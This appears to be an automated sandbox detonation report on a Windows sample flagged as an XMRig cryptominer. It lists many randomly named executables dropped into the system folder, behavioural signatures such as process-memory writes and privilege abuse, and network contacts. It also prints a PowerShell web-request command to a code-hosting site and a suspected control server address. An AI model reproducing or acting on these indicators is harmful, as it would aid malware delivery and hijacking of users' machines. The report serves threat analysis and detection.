C:\Windows\System\GoxyEem.exe

C:\Windows\System\vWdWpmn.exe

C:\Windows\System\vWdWpmn.exe

C:\Windows\System\jhzmsAc.exe

C:\Windows\System\jhzmsAc.exe

C:\Windows\System\zClZPik.exe

C:\Windows\System\zClZPik.exe

C:\Windows\System\cVVHKaM.exe

C:\Windows\System\cVVHKaM.exe

C:\Windows\System\nTJezTg.exe

C:\Windows\System\nTJezTg.exe

C:\Windows\System\hYfZbmR.exe

C:\Windows\System\hYfZbmR.exe

C:\Windows\System\lzjSYvs.exe

C:\Windows\System\lzjSYvs.exe

C:\Windows\System\UHnGqbg.exe

C:\Windows\System\UHnGqbg.exe

C:\Windows\System\TZhIUAD.exe

C:\Windows\System\TZhIUAD.exe

C:\Windows\System\gVRDfEJ.exe

C:\Windows\System\gVRDfEJ.exe

C:\Windows\System\fnihmJA.exe

C:\Windows\System\fnihmJA.exe

C:\Windows\System\kIzJadg.exe

C:\Windows\System\kIzJadg.exe

C:\Windows\System\fgFUklZ.exe

C:\Windows\System\fgFUklZ.exe

C:\Windows\System\pAPUBBe.exe

C:\Windows\System\pAPUBBe.exe

C:\Windows\System\DaMzUDQ.exe

C:\Windows\System\DaMzUDQ.exe

C:\Windows\System\DdzkdMB.exe

C:\Windows\System\DdzkdMB.exe

C:\Windows\System\DjvpEeL.exe

C:\Windows\System\DjvpEeL.exe

C:\Windows\System\NNzSFFI.exe

C:\Windows\System\NNzSFFI.exe

C:\Windows\System\fbqmfGx.exe

C:\Windows\System\fbqmfGx.exe

C:\Windows\System\ggfoTji.exe

C:\Windows\System\ggfoTji.exe

C:\Windows\System\cmXhSlc.exe

C:\Windows\System\cmXhSlc.exe

C:\Windows\System\KbMLbRW.exe

C:\Windows\System\KbMLbRW.exe

C:\Windows\System\IZgqpoY.exe

C:\Windows\System\IZgqpoY.exe

C:\Windows\System\EUWrJDt.exe

C:\Windows\System\EUWrJDt.exe

C:\Windows\System\EjoICVW.exe

C:\Windows\System\EjoICVW.exe

C:\Windows\System\mkFgFOo.exe

C:\Windows\System\mkFgFOo.exe

C:\Windows\System\hOTyivq.exe

C:\Windows\System\hOTyivq.exe

C:\Windows\System\VOIgDPz.exe

C:\Windows\System\VOIgDPz.exe

C:\Windows\System\MVTvasC.exe

C:\Windows\System\MVTvasC.exe

C:\Windows\System\qmdGLFA.exe

C:\Windows\System\qmdGLFA.exe

C:\Windows\System\bafmVzV.exe

C:\Windows\System\bafmVzV.exe

C:\Windows\System\cgLXhEj.exe

C:\Windows\System\cgLXhEj.exe

C:\Windows\System\csNhqdi.exe

C:\Windows\System\csNhqdi.exe

C:\Windows\System\FMhTnWG.exe

C:\Windows\System\FMhTnWG.exe

C:\Windows\System\VJteMJY.exe

C:\Windows\System\VJteMJY.exe

C:\Windows\System\sRqCWRJ.exe

C:\Windows\System\sRqCWRJ.exe

C:\Windows\System\HvtcXyM.exe

C:\Windows\System\HvtcXyM.exe

C:\Windows\System\FWroFGD.exe

C:\Windows\System\FWroFGD.exe

C:\Windows\System\zIgrjhL.exe

C:\Windows\System\zIgrjhL.exe

C:\Windows\System\gELZjIl.exe

C:\Windows\System\gELZjIl.exe

C:\Windows\System\enwnIXB.exe

C:\Windows\System\enwnIXB.exe

C:\Windows\System\krcgpSh.exe

C:\Windows\System\krcgpSh.exe

C:\Windows\System\WWhOdna.exe

C:\Windows\System\WWhOdna.exe

C:\Windows\System\SUkDAlu.exe

C:\Windows\System\SUkDAlu.exe

C:\Windows\System\RpirwYF.exe

C:\Windows\System\RpirwYF.exe

C:\Windows\System\EgLYUSy.exe

C:\Windows\System\EgLYUSy.exe

C:\Windows\System\UEHXOQO.exe

C:\Windows\System\UEHXOQO.exe

C:\Windows\System\ZBNIcMj.exe

C:\Windows\System\ZBNIcMj.exe

C:\Windows\System\waOpCzK.exe

C:\Windows\System\waOpCzK.exe

C:\Windows\System\SEdDnKG.exe

C:\Windows\System\SEdDnKG.exe

C:\Windows\System\OOWhsHX.exe

C:\Windows\System\OOWhsHX.exe

C:\Windows\System\RLuicgD.exe

C:\Windows\System\RLuicgD.exe

C:\Windows\System\oIjqarl.exe

C:\Windows\System\oIjqarl.exe

C:\Windows\System\YXRDqVm.exe

C:\Windows\System\YXRDqVm.exe

C:\Windows\System\YJUdWEo.exe

C:\Windows\System\YJUdWEo.exe

C:\Windows\System\SIlPxyb.exe

C:\Windows\System\SIlPxyb.exe

C:\Windows\System\dsSbatJ.exe

C:\Windows\System\dsSbatJ.exe

C:\Windows\System\UEwuUog.exe

C:\Windows\System\UEwuUog.exe

C:\Windows\System\ULSPxNq.exe

C:\Windows\System\ULSPxNq.exe

C:\Windows\System\IhDiYdL.exe

C:\Windows\System\IhDiYdL.exe

C:\Windows\System\FYaXgXq.exe

C:\Windows\System\FYaXgXq.exe

C:\Windows\System\tAfOYWE.exe

C:\Windows\System\tAfOYWE.exe

C:\Windows\System\sogrTuW.exe

C:\Windows\System\sogrTuW.exe

C:\Windows\System\gVNvtPz.exe

C:\Windows\System\gVNvtPz.exe

C:\Windows\System\LxfHdCG.exe

C:\Windows\System\LxfHdCG.exe

C:\Windows\System\UXGVqIQ.exe

C:\Windows\System\UXGVqIQ.exe

C:\Windows\System\tIsTMfL.exe

C:\Windows\System\tIsTMfL.exe

C:\Windows\System\QlZdFoC.exe

C:\Windows\System\QlZdFoC.exe

C:\Windows\System\FDdrskc.exe

C:\Windows\System\FDdrskc.exe

C:\Windows\System\XHwgMxk.exe

C:\Windows\System\XHwgMxk.exe

C:\Windows\System\Rznxibb.exe

C:\Windows\System\Rznxibb.exe

C:\Windows\System\rQGTYhV.exe

C:\Windows\System\rQGTYhV.exe

C:\Windows\System\xPRnfVp.exe

C:\Windows\System\xPRnfVp.exe

C:\Windows\System\LSWrkPY.exe

C:\Windows\System\LSWrkPY.exe

C:\Windows\System\yDPfgQa.exe

C:\Windows\System\yDPfgQa.exe

C:\Windows\System\ixBeTee.exe

C:\Windows\System\ixBeTee.exe

C:\Windows\System\XPsgKDq.exe

C:\Windows\System\XPsgKDq.exe

C:\Windows\System\ZPTsHbR.exe

C:\Windows\System\ZPTsHbR.exe

C:\Windows\System\kcQzDrx.exe

C:\Windows\System\kcQzDrx.exe

C:\Windows\System\qFTlxsd.exe

C:\Windows\System\qFTlxsd.exe

C:\Windows\System\fZgLPuv.exe

C:\Windows\System\fZgLPuv.exe

C:\Windows\System\Apvzxon.exe

C:\Windows\System\Apvzxon.exe

C:\Windows\System\lCcnLmB.exe

C:\Windows\System\lCcnLmB.exe

C:\Windows\System\IgfHKmb.exe

C:\Windows\System\IgfHKmb.exe

C:\Windows\System\FrxTSsx.exe

C:\Windows\System\FrxTSsx.exe

C:\Windows\System\jYVRpMA.exe

C:\Windows\System\jYVRpMA.exe

C:\Windows\System\XDQdETX.exe

C:\Windows\System\XDQdETX.exe

C:\Windows\System\zgWdASt.exe

C:\Windows\System\zgWdASt.exe

C:\Windows\System\UqNIonH.exe

C:\Windows\System\UqNIonH.exe

C:\Windows\System\cXXyyya.exe

C:\Windows\System\cXXyyya.exe

C:\Windows\System\nrypuXB.exe

C:\Windows\System\nrypuXB.exe

C:\Windows\System\xUjXAeD.exe

C:\Windows\System\xUjXAeD.exe

C:\Windows\System\wtNarUI.exe

C:\Windows\System\wtNarUI.exe

C:\Windows\System\zrksXdA.exe

C:\Windows\System\zrksXdA.exe

C:\Windows\System\GWgNBZR.exe

C:\Windows\System\GWgNBZR.exe

C:\Windows\System\sIyycJA.exe

C:\Windows\System\sIyycJA.exe

C:\Windows\System\Wonxuuq.exe

C:\Windows\System\Wonxuuq.exe

C:\Windows\System\CJZufOj.exe

C:\Windows\System\CJZufOj.exe

C:\Windows\System\GEjYepo.exe

C:\Windows\System\GEjYepo.exe

C:\Windows\System\wkjQuLB.exe

C:\Windows\System\wkjQuLB.exe

C:\Windows\System\CSbGjrc.exe

C:\Windows\System\CSbGjrc.exe

C:\Windows\System\dPXowZR.exe

C:\Windows\System\dPXowZR.exe

C:\Windows\System\bOwDjBQ.exe

C:\Windows\System\bOwDjBQ.exe

C:\Windows\System\rOCutFf.exe

C:\Windows\System\rOCutFf.exe

C:\Windows\System\lvyTEoS.exe

C:\Windows\System\lvyTEoS.exe

C:\Windows\System\KgwHwZr.exe

C:\Windows\System\KgwHwZr.exe

C:\Windows\System\OGACeLk.exe

C:\Windows\System\OGACeLk.exe

C:\Windows\System\vFtrhfM.exe

C:\Windows\System\vFtrhfM.exe

C:\Windows\System\ElpHTQC.exe

C:\Windows\System\ElpHTQC.exe

C:\Windows\System\rEvcWGS.exe

C:\Windows\System\rEvcWGS.exe

C:\Windows\System\sGjqdiT.exe

C:\Windows\System\sGjqdiT.exe

C:\Windows\System\WILjEYu.exe

C:\Windows\System\WILjEYu.exe

C:\Windows\System\yQCSNYH.exe

C:\Windows\System\yQCSNYH.exe

C:\Windows\System\meWKIcf.exe

C:\Windows\System\meWKIcf.exe

C:\Windows\System\QjsyJFU.exe

C:\Windows\System\QjsyJFU.exe

C:\Windows\System\iSzSIGW.exe

C:\Windows\System\iSzSIGW.exe

C:\Windows\System\AzXHViB.exe

C:\Windows\System\AzXHViB.exe

C:\Windows\System\mLkrugn.exe

C:\Windows\System\mLkrugn.exe

C:\Windows\System\fOicXfd.exe

C:\Windows\System\fOicXfd.exe

C:\Windows\System\nVRVxDV.exe

C:\Windows\System\nVRVxDV.exe

C:\Windows\System\dloAivE.exe

C:\Windows\System\dloAivE.exe

C:\Windows\System\QylcUpF.exe

C:\Windows\System\QylcUpF.exe

C:\Windows\System\pAjFoCs.exe

C:\Windows\System\pAjFoCs.exe

C:\Windows\System\qsEoNNv.exe

C:\Windows\System\qsEoNNv.exe

C:\Windows\System\hpYSKRB.exe

C:\Windows\System\hpYSKRB.exe

C:\Windows\System\tKyMRhR.exe

C:\Windows\System\tKyMRhR.exe

C:\Windows\System\xsMISCH.exe

C:\Windows\System\xsMISCH.exe

C:\Windows\System\oRaQStC.exe

C:\Windows\System\oRaQStC.exe

C:\Windows\System\kwUCRRh.exe

C:\Windows\System\kwUCRRh.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 09:37

Reported

2024-06-12 09:40

Platform

win10v2004-20240611-en

Max time kernel

112s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory


Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 784 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\fTZAIqa.exe
PID 784 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\gZuEqpn.exe
PID 784 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\gZuEqpn.exe
PID 784 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KYMOnNP.exe
PID 784 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KYMOnNP.exe
PID 784 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SSBFIdN.exe
PID 784 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SSBFIdN.exe
PID 784 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OyIiRIE.exe
PID 784 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OyIiRIE.exe
PID 784 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\bJaBNnG.exe
PID 784 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\bJaBNnG.exe
PID 784 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jgkMQgR.exe
PID 784 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jgkMQgR.exe
PID 784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\lCQbkxd.exe
PID 784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\lCQbkxd.exe
PID 784 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\JVDRIoK.exe
PID 784 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\JVDRIoK.exe
PID 784 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\yhUDVQr.exe
PID 784 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\yhUDVQr.exe
PID 784 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\BvUIybk.exe
PID 784 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\BvUIybk.exe
PID 784 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GHFVUlj.exe
PID 784 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GHFVUlj.exe
PID 784 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XeQfIXb.exe
PID 784 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XeQfIXb.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\YSARgSv.exe

C:\Windows\System\YSARgSv.exe

C:\Windows\System\awHgfdF.exe

C:\Windows\System\awHgfdF.exe

C:\Windows\System\fLDiOKj.exe

C:\Windows\System\fLDiOKj.exe

C:\Windows\System\RNPhXRA.exe

C:\Windows\System\RNPhXRA.exe

C:\Windows\System\cuTedGN.exe

C:\Windows\System\cuTedGN.exe

C:\Windows\System\EyFRnIi.exe

C:\Windows\System\EyFRnIi.exe

C:\Windows\System\PyGRJTg.exe

C:\Windows\System\PyGRJTg.exe

C:\Windows\System\BnNvlfp.exe

C:\Windows\System\BnNvlfp.exe

C:\Windows\System\RlsvkWK.exe

C:\Windows\System\RlsvkWK.exe

C:\Windows\System\rQeNEvM.exe

C:\Windows\System\rQeNEvM.exe

C:\Windows\System\SJgfMJB.exe

C:\Windows\System\SJgfMJB.exe

C:\Windows\System\PkqNncc.exe

C:\Windows\System\PkqNncc.exe

C:\Windows\System\sErXeYP.exe

C:\Windows\System\sErXeYP.exe

C:\Windows\System\LyoNkGo.exe

C:\Windows\System\LyoNkGo.exe

C:\Windows\System\ZXWuybQ.exe

C:\Windows\System\ZXWuybQ.exe

C:\Windows\System\pRrrnOv.exe

C:\Windows\System\pRrrnOv.exe

C:\Windows\System\NAIEqUZ.exe

C:\Windows\System\NAIEqUZ.exe

C:\Windows\System\NLwgueB.exe

C:\Windows\System\NLwgueB.exe

C:\Windows\System\aoQsyEh.exe

C:\Windows\System\aoQsyEh.exe

C:\Windows\System\TqimcrN.exe

C:\Windows\System\TqimcrN.exe

C:\Windows\System\BDUSHTi.exe

C:\Windows\System\BDUSHTi.exe

C:\Windows\System\gflqNBl.exe

C:\Windows\System\gflqNBl.exe

C:\Windows\System\onvdxua.exe

C:\Windows\System\onvdxua.exe

C:\Windows\System\DgCAqjU.exe

C:\Windows\System\DgCAqjU.exe

C:\Windows\System\NydYwQv.exe

C:\Windows\System\NydYwQv.exe

C:\Windows\System\VgmJnPq.exe

C:\Windows\System\VgmJnPq.exe

C:\Windows\System\JFHGDEh.exe

C:\Windows\System\JFHGDEh.exe

C:\Windows\System\sRWawiW.exe

C:\Windows\System\sRWawiW.exe

C:\Windows\System\fFYUxWl.exe

C:\Windows\System\fFYUxWl.exe

C:\Windows\System\eDBgMCu.exe

C:\Windows\System\eDBgMCu.exe

C:\Windows\System\xFDcBEo.exe

C:\Windows\System\xFDcBEo.exe

C:\Windows\System\TOpsXzk.exe

C:\Windows\System\TOpsXzk.exe

C:\Windows\System\MnGvqsA.exe

C:\Windows\System\MnGvqsA.exe

C:\Windows\System\EuqIMNM.exe

C:\Windows\System\EuqIMNM.exe

C:\Windows\System\fWdJLBG.exe

C:\Windows\System\fWdJLBG.exe

C:\Windows\System\ynXLsDV.exe

C:\Windows\System\ynXLsDV.exe

C:\Windows\System\vyyGfxH.exe

C:\Windows\System\vyyGfxH.exe

C:\Windows\System\JQpDNfm.exe

C:\Windows\System\JQpDNfm.exe

C:\Windows\System\tkTjdKx.exe

C:\Windows\System\tkTjdKx.exe

C:\Windows\System\NLFTngg.exe

C:\Windows\System\NLFTngg.exe

C:\Windows\System\NbrXlWP.exe

C:\Windows\System\NbrXlWP.exe

C:\Windows\System\QfCDMvO.exe

C:\Windows\System\QfCDMvO.exe

C:\Windows\System\vhbrfzL.exe

C:\Windows\System\vhbrfzL.exe

C:\Windows\System\LKzPwEm.exe

C:\Windows\System\LKzPwEm.exe

C:\Windows\System\ySfVwzL.exe

C:\Windows\System\ySfVwzL.exe

C:\Windows\System\EiQeQkM.exe

C:\Windows\System\EiQeQkM.exe

C:\Windows\System\gAiozBr.exe

C:\Windows\System\gAiozBr.exe

C:\Windows\System\HjdxcsL.exe

C:\Windows\System\HjdxcsL.exe

C:\Windows\System\eoDxTCr.exe

C:\Windows\System\eoDxTCr.exe

C:\Windows\System\iZhNseI.exe

C:\Windows\System\iZhNseI.exe

C:\Windows\System\SnUmlwF.exe

C:\Windows\System\SnUmlwF.exe

C:\Windows\System\LUNsQuP.exe

C:\Windows\System\LUNsQuP.exe

C:\Windows\System\iJARVvc.exe

C:\Windows\System\iJARVvc.exe

C:\Windows\System\OByHKUW.exe

C:\Windows\System\OByHKUW.exe

C:\Windows\System\PjuKkfJ.exe

C:\Windows\System\PjuKkfJ.exe

C:\Windows\System\xTcNMQU.exe

C:\Windows\System\xTcNMQU.exe

C:\Windows\System\NsfkyEA.exe

C:\Windows\System\NsfkyEA.exe

C:\Windows\System\LTtqCsx.exe

C:\Windows\System\LTtqCsx.exe

C:\Windows\System\vlZgteZ.exe

C:\Windows\System\vlZgteZ.exe

C:\Windows\System\EXMTKSj.exe

C:\Windows\System\EXMTKSj.exe

C:\Windows\System\sHFmMwU.exe

C:\Windows\System\sHFmMwU.exe

C:\Windows\System\AOPvKOP.exe

C:\Windows\System\AOPvKOP.exe

C:\Windows\System\ilwewGk.exe

C:\Windows\System\ilwewGk.exe

C:\Windows\System\rhokPVz.exe

C:\Windows\System\rhokPVz.exe

C:\Windows\System\oQUZjHk.exe

C:\Windows\System\oQUZjHk.exe

C:\Windows\System\BgRrezV.exe

C:\Windows\System\BgRrezV.exe

C:\Windows\System\SFacigC.exe

C:\Windows\System\SFacigC.exe

C:\Windows\System\QkjoaWo.exe

C:\Windows\System\QkjoaWo.exe

C:\Windows\System\MCsNFpm.exe

C:\Windows\System\MCsNFpm.exe

C:\Windows\System\iGuYRrx.exe

C:\Windows\System\iGuYRrx.exe

C:\Windows\System\FRHYrkM.exe

C:\Windows\System\FRHYrkM.exe

C:\Windows\System\dZmhrNv.exe

C:\Windows\System\dZmhrNv.exe

C:\Windows\System\qGaslrA.exe

C:\Windows\System\qGaslrA.exe

C:\Windows\System\AwqKHZN.exe

C:\Windows\System\AwqKHZN.exe

C:\Windows\System\lkAabUF.exe

C:\Windows\System\lkAabUF.exe

C:\Windows\System\iAnmfiF.exe

C:\Windows\System\iAnmfiF.exe

C:\Windows\System\DIxyfPU.exe

C:\Windows\System\DIxyfPU.exe

C:\Windows\System\pDGgXjA.exe

C:\Windows\System\pDGgXjA.exe

C:\Windows\System\yXEwASw.exe

C:\Windows\System\yXEwASw.exe

C:\Windows\System\oyLPqHU.exe

C:\Windows\System\oyLPqHU.exe

C:\Windows\System\GLdUsrK.exe

C:\Windows\System\GLdUsrK.exe

C:\Windows\System\cRKkEKH.exe

C:\Windows\System\cRKkEKH.exe

C:\Windows\System\KZdyWCl.exe

C:\Windows\System\KZdyWCl.exe

C:\Windows\System\ZElzZgS.exe

C:\Windows\System\ZElzZgS.exe

C:\Windows\System\vzoQweU.exe

C:\Windows\System\vzoQweU.exe

C:\Windows\System\vMDtfRn.exe

C:\Windows\System\vMDtfRn.exe

C:\Windows\System\UwveHFb.exe

C:\Windows\System\UwveHFb.exe

C:\Windows\System\yXPabCl.exe

C:\Windows\System\yXPabCl.exe

C:\Windows\System\ERpatra.exe

C:\Windows\System\ERpatra.exe

C:\Windows\System\amvRodC.exe

C:\Windows\System\amvRodC.exe

C:\Windows\System\hKvvNWU.exe

C:\Windows\System\hKvvNWU.exe

C:\Windows\System\luupIzo.exe

C:\Windows\System\luupIzo.exe

C:\Windows\System\GTmbliH.exe

C:\Windows\System\GTmbliH.exe

C:\Windows\System\JHxAPZH.exe

C:\Windows\System\JHxAPZH.exe

C:\Windows\System\LdiLOUn.exe

C:\Windows\System\LdiLOUn.exe

C:\Windows\System\snNsjsL.exe

C:\Windows\System\snNsjsL.exe

C:\Windows\System\MkWmuae.exe

C:\Windows\System\MkWmuae.exe

C:\Windows\System\cbeCOyD.exe

C:\Windows\System\cbeCOyD.exe

C:\Windows\System\vpZjeIc.exe

C:\Windows\System\vpZjeIc.exe

C:\Windows\System\qNbkLRG.exe

C:\Windows\System\qNbkLRG.exe

C:\Windows\System\ytnvfsN.exe

C:\Windows\System\ytnvfsN.exe

C:\Windows\System\fvjIozn.exe

C:\Windows\System\fvjIozn.exe

C:\Windows\System\FUSjmCc.exe

C:\Windows\System\FUSjmCc.exe

C:\Windows\System\emgEbou.exe

C:\Windows\System\emgEbou.exe

C:\Windows\System\gmvtQlZ.exe

C:\Windows\System\gmvtQlZ.exe

C:\Windows\System\buhebhT.exe

C:\Windows\System\buhebhT.exe

C:\Windows\System\iqqQGWr.exe

C:\Windows\System\iqqQGWr.exe

C:\Windows\System\pILAncb.exe

C:\Windows\System\pILAncb.exe

C:\Windows\System\rbmCHPS.exe

C:\Windows\System\rbmCHPS.exe

C:\Windows\System\jyRdBsP.exe

C:\Windows\System\jyRdBsP.exe

C:\Windows\System\pIoRBRZ.exe

C:\Windows\System\pIoRBRZ.exe

C:\Windows\System\dHVeXQw.exe

C:\Windows\System\dHVeXQw.exe

C:\Windows\System\wfAIWxB.exe

C:\Windows\System\wfAIWxB.exe

C:\Windows\System\aQBgnZZ.exe

C:\Windows\System\aQBgnZZ.exe

C:\Windows\System\TtCnvjT.exe

C:\Windows\System\TtCnvjT.exe

C:\Windows\System\yhsAyDP.exe

C:\Windows\System\yhsAyDP.exe

C:\Windows\System\rMEFSaD.exe

C:\Windows\System\rMEFSaD.exe

C:\Windows\System\RJxFotO.exe

C:\Windows\System\RJxFotO.exe

C:\Windows\System\Stcjpyd.exe

C:\Windows\System\Stcjpyd.exe

C:\Windows\System\tQqfndP.exe

C:\Windows\System\tQqfndP.exe

C:\Windows\System\SgZHOaS.exe

C:\Windows\System\SgZHOaS.exe

C:\Windows\System\LUqGPRC.exe

C:\Windows\System\LUqGPRC.exe

C:\Windows\System\TVNrmkh.exe

C:\Windows\System\TVNrmkh.exe

C:\Windows\System\MCKeyhB.exe

C:\Windows\System\MCKeyhB.exe

C:\Windows\System\MxjpZXu.exe

C:\Windows\System\MxjpZXu.exe

C:\Windows\System\xPivZQX.exe

C:\Windows\System\xPivZQX.exe

C:\Windows\System\YlDPCvN.exe

C:\Windows\System\YlDPCvN.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3872" "2932" "2864" "2936" "0" "0" "2940" "0" "0" "0" "0" "0"

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 2.17.107.104:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 104.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files
